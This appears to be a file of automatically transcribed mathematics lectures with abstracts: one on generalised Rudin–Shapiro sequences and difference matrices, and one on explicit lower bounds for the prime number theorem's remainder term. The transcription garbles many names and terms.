binary sequence. So a sequence that is also has the square root N property. There have been many, many works about the square root N property and on this Rudin Shapiro polynomials. I just mentioned a few. So this is maybe far from being exhaustive, but I would be happy if you mentioned give me more names related work. So Aleutian menace France. So this is all alphabet not by year. So Aleutian menace France showed some bounds about an exponential sum that use this Rudin Shapiro sequence. I usually had a generalization of Rudin Shapiro. So I will talk about this a bit later. There is a reason for Ballister to do an archive to prove this the best constant in front of the square root N. So we had before this two plus square root two. There was a longstanding question whether you can replace this by square root six, which should be optimal and manage to prove this, but it's a very distributed history. You got it first and Safari already had kind of a constant here. So there are. So this basically the square root N problem has been solved. I just mentioned a few other names related to the work. So preload and Morton preload Khaled showed some results about the sum of Tory function of Rudin Shapiro. We have Khaled is the first time where this would in Shapiro sequence has been defined in an equivalent equivalent way by counting blocks of once consecutive ones in the binary expansion. So this is in the 70s. Doge up here 2004 provides a new method to attack moments of the Rudin Shapiro polynomials. Modric and River shows distribution results of the Rudin Shapiro sequence along crimes and squares. The tremendous force and tenor bone in the 80s showed a general framework where the Rudin Shapiro sequence and the paper folding sequence are specific particular cases and managed to show similar results. So for a general family Montgomery had a conjecture about about a part. So you look up the sub polynomial. So to say of the Rudin Shapiro polynomial and to have some bounds and this has conjectured to disprove Ballester, Kefelig Martin, who's also here, who got a general very general framework for this substitutive dynamic systems where the Rudin Shapiro sequence is also a special case. Rogers proved recently about the distribution of the values of the Rudin Shapiro polynomial accordingly normalized in the unit disk. There's a recent paper and Safari had several results on this credit and about this constant in front of the square and property. So the recursion that you get from this Shapiro construction is very simple. So this comes directly out of this and you can have an interpretation which is basically goes back to the first time it appears as far as I know is in Brieha College where they look at this Rn Rudin Shapiro sequence as minus one to the count of the possibly overlapping blocks one, one, the base two expansion of n. So we already heard this in the talk of Michael Komota. I just to mention one maybe one example. If you take 187 here and you expand it in base two and you count the number of blocks of size two consecutive ones, then you have here one block. There is another overlapping one. So two and here's three. So you count this as three and you take minus one to the three and the value is minus one. You can show that actually this is exactly what the recursion means in the base two expansion. So what I want to talk today is about this property here, which has been programmed by Kessomovina Labrashakruse according to their program to study several deterministic sequences regarding to distribution methods measures. And so it's known for quite some while and it follows basically from the spectral analysis of the of a special class of substitution dynamical systems. That's that the correlation measure of this Rubin-Chapil sequence is the Lebesgue measure. So basically you know that this sum is a little O of capital N if D is fixed. What they could show is that the correlation is really, really small. So basically this is a sum of minus one one. You have lots of cancellations, the error term or the distance from the zero from the mean is not square root N, it's of order log N. So it's quite a natural question. Basically how you can even in their results let D grow as a function of capital N and you still have this non correlation term. So this is one of the results. So what I mean by large scale correlation, the D can still be very large and you still have a non correlation of these terms. So the question that we asked, we tried to start to deal with some years ago is to find a combinatoric extension to general alphabets in order to regate some kind of correlation results of T's power meaning that we can still have D growing as a function of capital N, but still so to have the largest possible function of growing as capital N, but still have these non correlation properties. So this generalization there are quite a few out there mentioned maybe a paper by Aleutian Puskier-Milou from the 90s where they started to investigate the factor complexity of these generalizations found by Mendez-France-Enterne-Born and they could show basically that the factor complexity, so the number of factors of size L in these generalizations is linear which comes out also of a much more general effect about automatic sequences, but they could give an explicit value. So this is one of these combinatorial interpretations. Ryder had as far as I know was the first to look at the generalization of these wooden Shapiro sequence where we replace this matrix which is associated to these interrelated polynomials, recurrences by a general matrix related to Russofunity and this point of view has been brought up by Martin Kephelec in her paper and also in the monograph and Aleut Kadee presented even another generalization that don't look at consecutive ones in the binary expansion that you fix a size let's say D, let's say K and you fix a pair A and B and you count the number of blocks A and a arbitrary block of size K and the B. So you're moving A a block of size K and B through the digits of the digital expansion and you count the number of occurrences of these kind and these are related to the chain sequences and chain functions and which gives even a more general context about these Rune Shapiro sequences which have been used by Motri and Triva in their paper as well. Okay, so what we wanted actually to do is to find some results about how often we can avoid equal terms. So this is a very general definition. We say that we have an infinite sequence over a k term alphabet and we fix an integral vector so with m components and we run with this fixed integral vector through the digits or through the sequence and we give it a value of zero if we see the same symbol at each entry and we say one otherwise. So this is some kind of saying that the members or the elements of the sequence are highly non-correlated or are not correlated if at least one of these elements is different from the others. And so 2009 we could show that it's not possible to get better than a random sequence in terms of this correlation which is not very surprising but it took a bit of a combinatorial inclusion argument to get there. So if you fix a d and let n run to infinity and you want to maximize this quantity, maximizing means that two terms should be different then you cannot do better for all of the d's which means that the lim inf if the gross to infinity would be small in terms and the surprising part is that for Rudin Shapiro basically you hit the bound you can actually get exactly to the bound. And one application was basically one motivation was to construct some kind of sequences on the k-alphabet that hit this bound and this one were our generalization of the Rudin Shapiro sequence. I just mentioned one related result in that context so if you fix a d to a vector of m components and you run again through your sequence then you cannot always do better than the random case in terms of if the norm of the d gross then this limit is small and in that case Rudin Shapiro is not optimal if m is larger than 2. So it has been shown by Moduy and Jacques Hussis that if you take four terms in Rudin Shapiro then four terms in Rudin Shapiro are highly correlated so basically it's not possible to get this little o of capital N if you choose your d, your window or your distances between their terms in an according way. So what was our definition and I will then give a general context via difference matrices. What we need actually to prove is non correlation estimates we use exponential sums we use exponential sums and in doing so we need it in fact a function f that if you look at the differences matrices and reduce Modulo k permutes all of the elements of the alphabet so 0 up to k minus 1 and this function is periodic and there are several examples that give some generalizations that I mentioned before that can be coded by correct or not appropriate choice of this function f and a generalized Rudin Shapiro sequences is there is then a function where you have this kind of recurrence relation so what you do is you take an entry so you write it in base k you split off the last digit which I call j and then I have n k plus j and the Rudin Shapiro the count is the count of n plus the function that takes into consideration just the last digit and the n that is in front with a fixed f and f is a function that is periodic in the second variable. So this generalizes the class of generalized Rudin Shapiro sequences that has been suggested proposed by Martin Kefelig where you replace in the original Rudin Shapiro sequence the minus 1 by case root of unity and in the exponent you add the product of consecutive digits and in the case when case prime you can prove that this function is differences permute in the correct way and therefore rise to generalize Rudin Shapiro sequence in our sense. In the specific case when k equals 2 we get this generalized original Rudin Shapiro sequence of the alphabet 01. There are some quite interesting other examples I just mentioned here you can count other blocks of size 2 1 0 0 0 1 0 1 etc with this type of this definition. Another when you count you give the total count of the number of sub blocks 0 0 1 1 and 2 2 in the ternary expansion of integers. So what are the result that we got we could generalize this result by Mudri and Shakruzi directly when case prime with the help of this definition we still get if the distance of the two elements so let's say that the one is less than d2 if this distance is a little over capital N we still get an asymptotic formula and the error term is very small and we tried to use this construction to glue various primes together to get at least k square 3 and this was actually the extension that we proposed at that stage. We use several generalized Rudin Shapiro sequences and use some kind of a contour and a memorization construction to glue them together and to define a generalized Rudin Shapiro sequence to k over an alphabet which is square 3 and we got a result of that type where we still get the correct main term but the error term is well is is is worse and this comes of the fact that we use a procedure outlined or used by King about the sum of digits in different bases and we have to take into consideration some carry propagation and we have to cut it down and we lose quite quite some bit there. So but we had no idea how to get to to to composite composite values of k how to what is the correct combinatorial interpretation or by a recursions to get to these non square 3 fix. So this is where the differences matrices come in. This is a concept that we found out and was also worked out by Pierre-Adrien. This is thesis. You take an alphabet of size k so there is no arithmetic condition on k now. G should be a finite a billion group. This could be the residue small of the k but there are other possibilities as well. And then there's a notion that is called a block additive function. This is very well known goes back to at least a manual people and who called his digital functions. So what is what it does is you run you write and in base k you take consecutive integers and then for each pair of digits you give it a weight and you have therefore a weight function. Of course if you take who didn't appear as block additive if the function f gives a 1 if you have 1 1 and in other cases it gives 0 as a value. Block additive functions are automatic sequences are k automatic. And Javier is one of them. So what is interesting about this block additive functions what we need it actually in our proofs is that we need that everything that we get the whole permutation of our original alphabet. And if you take here a group G and we fix an element little g. Then what we want is for each i and j that we fix and if we run through the whole alphabet all of the differences should be taken the same number of times. So this should be independent of the g. So in other terms we need a key distribution in some sense in terms of differences on the group. And this can be written in the sense of differences, differences matrices, differences matrixes, matrixes matrixes of r rows and c columns. When you take any choice of two rows and you do the differences of these two rows then you hit every element of the group just the same number of times. So give maybe a couple of examples. So here this is the original Rudin-Shapeo sequence. If you look at the second row and you subtract the first row and of course you get the zero here and the one here so which is the whole z2 so the rest is just modulo2. If you take this one for instance and take the third row and you subtract the second row you get the zero, you get the one, you get minus one which is two modulo3 and so you hit all of the terms of the group. This can be proven also that this is the case here and also here and this goes back to this construction that we had before for primes. This is a highly non-trivial area and maybe these differences matrices are not that well known but they are quite related to these Hadamar matrices and its Hadamar matrix is a square matrix where you basically put ask for all of the rows should be orthogonal one to the other. So for any choice of two rows you have a non-tagonality relation and all of the entries are just plus ones and minus ones. At these Hadamar matrices there is a conjecture about the existence of Hadamar matrices going back to 1893 to Hadamar who asked whether it is possible, whether does there exist for any multiple of four as a dimension of the matrix, does there exist a Hadamar matrix? This is still open and for instance the last result in that perspective is a couple of lists of go and the best result known is now that up to 664 there is always a Hadamar matrix but nobody knows whether there exists a Hadamar matrix of size 668. So this is still open and you can show that different matrices and Hadamar matrices are somehow related. Basically you can show that the Hadamar matrix of size n exists if and only if there exists a matrix, a different matrix of size n over the group Z2, so over 0, 1. This is basically equivalent. So just to mention that this is quite a difficult problem in combinatorial designs and maybe the first paper goes back to Juniko who studied several cases. The most comprehensive monograph about these kind of combinatorial matrices is maybe Hidayat, Slovan and Stufken about orthogonal arrays and there is still quite ongoing work about the classification of these different matrices, for instance the PhD thesis of Lampio from Helsinki a couple of years ago where he tried actually to give a computational approach also to calculate or to find all of the different matrices possible of a fixed dimension. And I just mentioned maybe you can show that for certain integers the set of all differences matrices is empty and basically this was the fact that we could not find to get it to dimension 4, 4 is composite. But if there exists, if you change the underlying group there exists a difference matrix. So Hidayat and basically there exists these different matrices whenever you find a good group. So there is a result that appears in that book of Hidayat about these orthogonal arrays which goes the way that whenever your dimension of the matrix is a power of a prime then there exists a billion group such that the set is non-empty. So you can give basically a difference matrix whenever the size of the matrix is a power of a prime. The construction uses finite fields. Basically what you do is you write down your large columnomial, you cut it down somewhere and you use the multiplication table of the large field to construct this table with a binding. So this is a construction but maybe here's an example, for D99 so South 99 of the group Z3 there are two different classes so they're completely different types of different matrices. So equivalence clause I won't go into details, equivalence clause means that you can normalize in some sense your matrix that they are ordered in rows and columns, like we do graphically. And it's quite strange that you can change a little corner inside this matrix and matrix until you still get the difference matrix. And so Lampe did quite a few calculations about these classes. And here I just mentioned maybe another one where you see that the first five rows stay the same and here the next four are completely different from the first class. And he could show that here there are five equivalence classes of these matrices. Okay, so I mentioned quite rapidly the result by Pierre Adrien that he had. He used these difference matrices to get the Modry-Chacuzzi correlation result when the size of the matrix is a power of prime where we know that there is a difference matrix. And so this solves actually the problem of the size four alphabet where he needed actually to change the group, the underlying group. And therefore could construct Rudin-Chapiro sequence on the alphabet 0, 1, 2, 3. So on really four letters, all of the four letters are used to get this correlation result. And with gluing together he could go up to composite alphabet size and losing again in the error term by a procedure that is known back in. Okay, so the question that we asked in, and maybe in the last minutes I will show us six minutes. I will show how to, what was our motivation. Let's, if you fix D, is it possible basically to show that for any kind of generalized Rudin-Chapiro sequences, sequence that is based on this difference matrix, we get as good as in the original case, which means that the error term is of the size of log n. And yeah, so the question was then or is still ongoing, we do not know whether it's possible to let D grow as a function of capital n to still get this one. But this was already the challenge to find the conditions on our, whether are there any conditions on this function to get this bound. And so what this generalizes is this discrete correlation coefficient that I gave before, because this coefficient only takes care whether symbols are equal or not. Here we fix i and j and we look how often we hit i and j basically asymptotic, in an asymptotic sense. And if you look here at the generalized Rudin-Chapiro with p because three that we have, and you run basically through the sequence with a distance of one, two, three, four symbols, you get a zero, one, etc. And you might see that yeah, all of these couples, all of these pairs appear and the correct way with a very small error term. This is what we got empirically. And this happens for any choice of the underlying difference matrix. Maybe I go a bit further. Okay, so the, we got that result. Just mentioned quickly how, what was the proof idea. What we actually need is to study differences in these block additive functions based on this digital expansions. And what we do is we write n and n plus t in base k. So from left to right in the unusual way. So this is the lowest significant digits and going up to the highest significant digits. And we stop at the, to see n is the digit, the last digit where these expansions differ. So meaning that from starting from here, there is no carry that goes over to the largest digits. And to define some kind of a fiber, fiber of n. And this fiber takes care of the digit that is next to this CN index CN. And what we do next is to decompose our interval. So our, we look first of these elements of the fiber and let's I, so we take n, we look at the digital expansion and we put an I on the, on the higher placed digit next to the last digit that is affected by the addition of t. And when you now go to this generalized through in Shapiro sequence based on this block additive function, then we can write it like this, where C1 is a function that only lives on the lower placed digits and C2 is a function or a constant in that case that lives on the lower placed digits. When you now go to the difference and this is exactly what we want first in the first step, then we get the constant here and the upper part just goes away because is not the fact that the addition of the addition of n. What we now do is I change a run from zero up to K minus one to the whole alphabet. And so this difference will run through all of the group elements and basically our conditions imposes that we run in the correct way. We hit every group element in the same way and we get the result that in a fiber we have u n plus t equals u n plus g equally often whenever we fixed a g in the group. So what we need is that the difference of the function hits this in the correct way. And I skip the proof which is maybe is then just to decompose your large interval with capital n into fibers. You count the number of fibers that you need to eat up in some sense all of the integers 0 up to capital n and then you get a lower bound. So you get the sum of digits that will appear naturally in some way and you get a lower bound and the error term is of the size log n. But in the mean if you add this over the group of course you get capital n. So which means this difference between the mean for our little g and the mean value over the cardinality of the group this distance cannot be too large. What we get is actually then in that case we exactly get the log n. Yes so this was our results and we can use some probabilistic techniques in order to show what we had before. So if you fix i and j and look at what is the limit. So how often you get i and j whenever u n is generalized through the Shapiro sequence. Yes we basically we then get the result that we wanted and there are some higher dimension analogs that I just give a few pictures. You can use this combinatorial setting I would say to generate higher um uh root in Shapiro sequences that live on a d-dimensional t-dimensional space. And so what this means is if you fix a little square and you fix a vector d and to let this square grow and to compare the square with the with the shifted square. If you look at the mean value of the differences that the different terms that are in the squares then you still recover this log n term. And depending on the setting depending on the difference matrix that is basically underlying the underlying concept you can have quite nice pictures. So this is root in Shapiro vertically root in Shapiro horizontally and you get the sum of the two root in Shapiro's modulo 2. You still get this log n behavior and yes so quite pseudo random random pictures in the end. So I would like to stop here and thank you very much for your attention.
|
We introduce a family of block-additive automatic sequences, that are obtained by allocating a weight to each couple of digits, and defining the nth term of the sequence as being the total weight of the integer n written in base k. Under an additional combinatorial difference condition on the weight function, these sequences can be interpreted as generalised Rudin–Shapiro sequences. We prove that these sequences have the same two-term correlations as sequences of symbols chosen uniformly and independently at random. The speed of convergence is independent of the prime factor decomposition of k.
|
10.5446/53715 (DOI)
|
So, thank you for the invitation and I will then switch to full screen mode, which means I will not see myself, but this is not a big problem. And the topic, what I am talking about is large values of the remainder term of the prime number CRM and I will immediately see what I mean exactly by these large values. First, we have to remember the explicit formula for primes and then delta x is the remainder term of the prime number CRM and we see that this depends on zeros of the zeta function and which I will always denote by beta plus i gamma and we can restrict our attention to zeros with height less than x and then we see that the oscillation, what I can say caused alone by a zero row is x to the beta divided by the modulus of row, which means that asymptotically it is x to the beta divided by gamma. Now little would raise the problem, which perhaps is not clear why he raised it, prove an explicit oscillation result for the remainder term, if we suppose the existence of a hypothetical zero with real part at least one half and for simplicity with imaginary part positive. Now the reason why he raised this problem was that earlier the best result was a consequence of the fragment Lindelof CRM and it had two drawbacks. One was that the bound was just x to the beta minus epsilon, so smaller than the oscillation caused by the zero and secondly it were even this weaker bound was ineffective. So that means if we even knew the existence of a concrete zero or a hypothetical zero, we could not see, could not say from what point on and what size is this oscillation. And this problem was then, this is due to the possible interference of the set of zeros, which means that if I consider some of complex numbers, then I cannot be sure that the sum of these complex numbers can be estimated from below by any term of this sum. So that means if we have positive real numbers, then actually we can estimate from below the sum by any term of it, but if we have complex numbers, then this is naturally not the case. Now in order to settle this case, this was, I don't know whether for which particular problem, but actually in order to settle the problem of interference of complex zeros, Turan developed his method Turan's power sum method and this was the most frequent tool used in these investigations as well. Now just to remark that if we consider zeros on the critical line, which we know that there are a lot of zeros there, then we get an even larger oscillation than the one caused by any single zero itself. Maybe we can gain a factor three times the diluted logarithm of x, which I will denote by log 3x and even this oscillation occurs in most plus and minus direction, in most direction, which actually disproved type of conjecture of Riemann, which appeared in his work, where he showed that at least the second form of the remainder term, which appears here, this pi x minus li x is oscillating in both directions. Riemann showed that pi x is always less than li x and this was just in the same year 1914 and it proved that this oscillates in both directions, which is a size even bigger than the oscillation caused by a single zero. Interestingly, in the same year, Lehmann showed that at least for up to 10 million, pi x is less than li x and now we know that at least until 10 to 20 really pi x is less than li x. But we will not concentrate on sign changes now, so we will concentrate just on the size of the absolute value of the remainder term and in this case, it is not so critical which form of the remainder term we consider. So we will work with this delta x, which contains as you see the prime powers as well and therefore it doesn't appear this negative effect, which makes pi x less than li x usually. Now if we define with dy the average of the modulus of delta x and with sy, so phi, the maximum values of the modulus of the remainder term for x less than y, then to run succeeded in 1950 to solve the problem and the lower bound is really bigger than x y to better not minus epsilon. So there is a concrete explicit function and it is also explicitly given independence of the row from which point this estimate is true. Now some eight years later or nine years later, now we will prove the same for the average of the remainder term. The method in both worlds, the most critical part is to run spores some methods I mentioned or edited complex numbers if we have complex numbers and there are some might be much smaller than the largest term for example. And the two round work the other method which up to some extent helped to face with this situation. So in some sense with a factor what we will see later he succeeded to neglect this inter possible interference of zeros. So the result of Turan which was used in both his proof and Knapov's proof was the so-called second mean theorem of Turan's power some method that if we consider power some of n complex numbers, we use a normalization that the largest of this number has modulus one. And then if we consider we cannot state naturally that for every new this value should be large, but what we can state and this is what his second main theorem states that if we consider at least n values and consecutive values of this exponent, then apart from a very significant factor which is much less than one, we will reach the bound one and we have still a factor depending on these coefficients bj. Now in the present problem we cannot we don't need any coefficients. So that means we have a special case of this Turan second mean theorem which can be written in this case so that the new power some of n complex numbers taken if you take the maximum value for n consecutive values. And then this is a function which depends exponentially on the number of variables and it depends somewhat less drastically on the beginning of this interval. Now one can easily see that if we consider for example nth root of unity, then we have n minus one consecutive values always which are exactly zero and then we have one which is large. So that means in some sense this result is optimal and we don't know whether the lower bound is optimal or not. I used not exactly the same result but a similar argument that means it was more generalization of Dirichlet's approximation theorem to show that if we consider oscillation then this oscillation is really apart from a factor one minus epsilon, the oscillation is x to the better not divided by rho not in modulus. So that means the oscillation caused by a zero occurs really from time to time and this seemed to settle so to say to be precise almost completely the oscillation problem of delta x. And here this function c2 of rho not and epsilon was effective as well. The proof used Turan's method in not Turan's power sums but it was similar to the way Turan and Kanapovsky handled their proof their results but the difference was that I used another approximation theorem and I used still the general framework of Turan's result. Now immediately there is a question that what is the optimal oscillation result because we know that we have two zeros to conjugate zeros of the zeta function always and therefore I thought also that one minus epsilon could be replaced by two minus epsilon and this would be really the case if rho not was isolated if we would not have nearby other zeros and then the question was up to some extent or almost completely really settled by Silad Reves in 83 he showed that we don't know what is the optimal constant for the zeta function naturally if the Riemann hypothesis is true then the optimal constant is infinity. We remember that we have then an oscillation of size log log x times the log log x times the term of any zero on the critical line and so then this question is interesting just when Riemann hypothesis is false and so therefore it is very hard to say even how to say mathematically precisely what we mean by the optimal constant. Now he proved that the optimal constant is pi over 2 which meant the pi over 2 the result which I stated was true this pi over 2 minus epsilon instead of one minus epsilon on one hand and on the other hand if we consider a larger by the class of functions which include the zeta function as well then at least for this larger class of functions there are some functions for which pi over 2 is really the optimal constant. We could formulate it also that there could appear such intricate configuration of zeros of the zeta function so that the oscillation would be really not exceed pi half minus epsilon times the expected and proved value x to the rho naught over rho naught. Now I proved also several results on these other methods both for the average and the maximum value thereby improving the earlier results of Turan and Knapovsky also Schrager Puchta showed such an improvement and what our goal is that naturally different forms of these CRMs had different conditions concerning the dependence of y from gamma naught that means from if rho naught is given and then from which point on can we assert that the average or the maximum value is large then a lower bound as a function of y and gamma naught that means how large is really the average or the maximum dependent on gamma naught. A certain problem is that whether this large values occur just somewhere between one and y we can state that the average or the maximum is large or we can say that they occur up to some extent near to y so that means near to y means unfortunately not near on the normal scale but near on the logarithmic scale so that means that the logger if for an interval of the form a y to y and this beginning of the interval a y should be at least on the logarithmic scale near to log y. Now again we can consider effective or ineffective estimate and another method of mine gave a result which produced a lower bound which depended on the derivative on the absolute value of the derivative at the place rho naught which for concrete zeros which we know is really completely okay but it would be already somewhat disturbing so it would make the CRM let's say a little bit ineffective if we speak about a hypothetical zero and this could cause problems in some applications. Now I mentioned already that the really difficult case is Bendy and the really interesting case is Bendy rho naught is not on the critical line that means the Riemann hypothesis is really false. Now I mentioned just some results in this direction I proved that actually we can always reach that not only we have values as large as y to the better not divided by y to the better not divided by rho naught or x to the better not divided by rho naught sometimes but also that the average is at least y to the better not multiplied by some constant depending on the imaginary part of the zero and this has a corollary that on the Riemann hypothesis the average of the remainder term in modulus is at least square root y or the average is square root x. Now Krama showed already exactly 100 years ago that on the other hand the average of the remainder term in absolute value is at most constant times square root y so we know exactly apart from a constant the order of magnitude of the average order of the remainder term supposing the Riemann hypothesis this is this estimate here and on the other hand this is still unclear the maximum value of the remainder term between these two bounds. Now this actually served as an introduction for the CRM for which I will also sketch the proof namely that if we have a concrete zero of the zeta function and we know that y is enough large depending on an explicit way from the imaginary part of the zeta I just mentioned that already I mentioned that but what emphasize that all these constants c will be explicit constants. In this case we can localize we can consider the average of the remainder term in modulus and localize in the average in the logarithm scale from a beginning point near to y until y and we get for it a lower estimate which is just with a factor log log y square smaller x minus log log y square smaller than the expected value and concerning the localization I lose again the same log log y square quantity. Now the strategy is that we consider weighted mean value that means as I mentioned already concentrated to interval a y y where log y is near to log y we already specified that actually this a y would be this quantity so log a y is less than log y this quantity log log y square. Now this weighted mean value can be transferred into a sum of residues containing the zeros of the zeta function and up to this point the strategy is same as by Turan, Knapovsky and in my earlier works. The novelty is that the weight is chosen so that only zeros very near from row not should get non negligible weights and in this way we can avoid both Turan's method and both the loss which is caused by using Turan's second mean theorem. This means this quantity what we have here this is actually a loss compared with the expected value and naturally due to this averaging process and due to this procedure of getting rid of other zeros near to row not we have also a loss in the procedure but this loss is just a function x minus log log y squared various in the works of Turan and Knapovsky for example they had a loss of log y divided by log log y and we have instead log log y squared so we have a much smaller loss than in the procedure of Turan and Knapovsky. Now in the present method we will what I said we will get rid of zeros not very near to the critical given zero row not so that means we will consider the construct of weight function which is asymptotically the same for a small group by group I mean just the set so there is no group operation here so for a small set R of zeta zeros near to row not it is asymptotically the same naturally these zeros are very near to row not then at the distance basically this C naught we can say it's five so at the distance at most five for all the other zeros the weight function will be just zero and in this way those residues will not appear at all you know and due to other part of the weight function the weights there will be not zero but negligible the weights for the residues if we are more far than five from this point now the in fact the original CRM was formulated in such a way that the upper bound was by now we consider in on the logarithmic scale an interval symmetric to by and this will be our estimate and here what we should possibly keep in mind is that script L is log log y squared lambda is log y and L is log log y so capital L is log log y lambda is log y and script L is log log y squared and script L is which on in the exponential scale appears both in the loss and the both in the localization and this will be the exact form in which I will prove our result and the beginning is a procedure what was observed by Turan that if we have a zero and we have near to that zero near means just that the on the logger on the the height is not too far from it but the zero is little bit more on to the right then we take this other zero instead of our original zero and so with step by step but the number of steps is at least at the most just log log y or we can log y we can go further to another zero what we call an extreme right hand zero and this extreme right hand zero has the property that its real part is at least as large as the real part of the original zero so in this oscillation CRM which has gained by it the imaginary part is can be somewhat larger but this is not decisive and still we have a control about it the original imaginary part was at most square root of lambda and by this procedure it will be just lambda squared and lambda is just log y so that means it will be still near to log y log y squared as at most but on the other hand more on the right and this is an important point of view that for this zero we have already if we go a little bit far to the right with a quantity one over log y then we will have a large so if we go a little bit more to the right then already in the how to say vicinity but not vicinity but in a rather large height so that means three times log y higher or three times log y lower there is no zero as at all so that means in some direction and at least we solved the isolation of row not but we are very far from saying that the row is an isolated zero so this procedure is just how to say routine used always by Turan and Knobsky and also myself in these works and this is just a nearly trivial starting point for the procedure and if so that means our final zero is this gamma wave K beta wave K row K wave this is what we substitute the original row not by this zero but then comes the idea is that we take a very small epsilon and then we consider zeros which can be reached from one from the other by a chain of zeta zeros so that neighboring zeta zeros are at a distance at most epsilon from each other but this epsilon is not a small absolute constant but this epsilon is something which is very small so first we consider already zeros which could be reached from each other by a chain of zeros at most with a distance at most as you see one over log y and this is even in the denominator multiplied so that means this one over log log y to the third power so these zeros are very near to each other if in this group there would be just one zero then this wave could be right called an isolated zero already and then we could so to say go further with this procedure but what we know just is that it might be so that means definitely the starting set of zeros was contained at most log log y that means L zeros this is by the result of back line and this was later we can so to say nest into each other smaller and smaller groups of zeta zeros so that they would be very near to each other but any zero outside that small set would be much more far from these zeros than those zeros are from each other so that means this whole we repeat the same procedure and we take all these sets which of zeros which could be reached so equivalence classes of the zeros which could be reached from other by a chain with a smaller epsilon to smaller means by a factor log log y third smaller and if we always consider and continue our work from the smallest set then this whole procedure must finish quite soon so the number of step should be just log L that means much much smaller and in this way in this way we will get very soon just really not an isolated but a set of zeros what we will call our by our this the property that they are very near to each other any other zero is already much further from it much further means still it may be a small distance but much further with a power with a factor log log y to the second power and then we consider an arbitrary zero from this set our and we will have so that means basically the same extreme right hand property will be true for this zero maybe with a little bit changed parameters and after which we consider polynomial we construct such a polynomial which is so to say since the residues will occur at the races robin minus row prime if so that means in this way we will get such a polynomial that if we consider any other zero which is not in this small group but at most the distance five from it then we will have a property that will be interesting in our case so that means if we are not in this small set of of equivalent zeros then the polynomial is zero and we have so this is one thing for those zeros which are in this small group this polynomial at the place row minus row one is asymptotically the same exactly one one plus or the one over log log y and we know bound for the value of this polynomial at different places a roughly speaking e to the l or s absolute value to the l so on in an exponential scale we have this l which is log log y squared l squared ten times or forty times i don't know how a hundred times i don't know this is the value of l and this will be equal to 40 times l will be the actual loss in the procedure and so this l will have an important role but that means we have a control over the size of the polynomial and here comes really the weighted mean value of delta we consider this delta x divided by x to one plus row one times weight on the value y over x so that means this is also in some sense on the logarithmic scale and the weight function is defined together with this gs function and the gs function has three factors the first factor is relatively small if we are let's say at a distance at least five and at most log y from the zero then if we are at least a distance log y from the zero then this factor will be very small that means negligible and with this ps we have a control over its increase along the imaginary axis or along any vertical line and we have this property that the row minus row one will be just for those zeros for which the value is naturally very near to one then for those zeros will be zero and so I go back to this that the polynomial will be zero at this points which are very near no the polynomial will be zero for those zeros which are not very near to the distinguished row one in this gamma less than gamma one less than five and the polynomial will be at the places row minus row one nearly equal to each other so that means the residues will be nearly equal to each other in this small group for the small group of zeros. Now one can show relatively easily that this weight function which is defined by an integral what we can do that if a is large then we shift the line of integration onto the left if a is small we shift the line of integration on into the right and if a is so to say in between that means not too small not too large then we integrate on the line on the imaginary line itself and then due to this factor which is sigma square minus t square in absolute value this will be very small if we are far at least the distance log y from the zero p s takes care to eliminate the residues at the zeros which are near to row one but not very near to row one and this factor will take care for others but now considering just the weight it is still this property is not needed just the way how quickly the polynomial p might increase and what we get will be that we will get either a very small quantity lambda is just log y so this would be the same as y to minus a for example and this will be very small if a is large this will be very small if a is small and in between we have again the same e to the l which is up to some extent lost in the procedure and this is the way how we show this and so that means it is a technical question now if we know this weight function then we can already estimate the weight of mean value of our original u y which was defined earlier in this way so that means delta x divided by x to one plus row one multiplied by these weight functions and then this weight function has the property that it localizes the whole integral just for the range y times e to the minus l to y times e to the 2l apart from a loss of factor e to the l and so that means that we can really forget about the tails of this integration and we get a localized average of the delta and this is exactly this d y what we will in this way we can connect the localized average with the full average of u y now if we go further to v y then this v y can be which is a weight of mean value of the remainder term can be expressed by integral and this integral is can be proved easily by partial summation we get the logarithmic derivative of zeta there and this means that the original mean value as we see here if we change the integration in this way then we get an integration for the function h s plus row one so we get an integral here in this way and we see that the residues occur at the places then s plus row one is equal to row that means if s is equal to row minus row one and this g s is small if row one is more far than five already from the original point row one this p is equal to zero that means g is also equal to zero if row is not in R but I forgot to write here it's here if so it's a distance is at least at most five in this case this polynomial p takes care for eliminating the residues at those zeros which are not in R so these are the zeros which are at the distance at most five maybe quite near to row one but not very near in the sense that not in this small group are so in this place is the function is analytic and this means that we get actually type of we can call it a power sum but I'm not quite precise here because I should write here that row is not equal in R plus oh no no that's okay that for all the zeros which are not equal to not in this size very near to R and but fortunately let me see oh not in R yes so that means okay yeah please continue Janosch Christian should ask the question after your talk yes that's thank you thank you so that means in this way we have the residues for all the zeros of the zeta function which are not near not very near to the original one and in this way we will get so we can call it a power sum but the value of this to evaluate this power sum is very easy excuse me for a moment yeah yeah so UV is yeah so UV is contains zeros which are so this is not not correct at all not equal to R yeah this is not correct we have zeros which are very near to R plus we have zeros which are at least the distance from R so that means these are not equal to R not in R these are aranials maybe the question refer to this so we are some zeros which are so if we consider the zeros which are so to say at the distance at least log y then we get y to minus two as an upper bound here if we consider zeros which are at at least five from it then again due to another part of the g function we get again something relatively small not so small like here but relatively small now what appears still still what remains still is that for those zeros which are in R we get asymptotically one for for each zeros and so we can evaluate easily the power sum for R and as I mentioned the zeros which are not in R but at a distance at most five they don't appear at all and in this way we get for this power sum we get exactly the lower estimate and we get by this lower estimate we can prove the original CRM as well and thank you for your attention
|
In the lecture we prove a lower estimate for the average of the absolute value of the remainder term of the prime number theorem which depends in an explicit way on a given zero of the Riemann Zeta Function. The estimate is only interesting if this hypothetical zero lies off the critical line which naturally implies the falsity of the Riemann Hypothesis. (If the Riemann Hypothesis is true, stronger results areobtainable by other metods.) The first explicit results in this direction were proved by Turán and Knapowski in the 1950s, answering a problem of Littlewood from the year 1937. They used the power sum method of Turán. Our present approach does not use Turán’s method and gives sharper results.
|
10.5446/53717 (DOI)
|
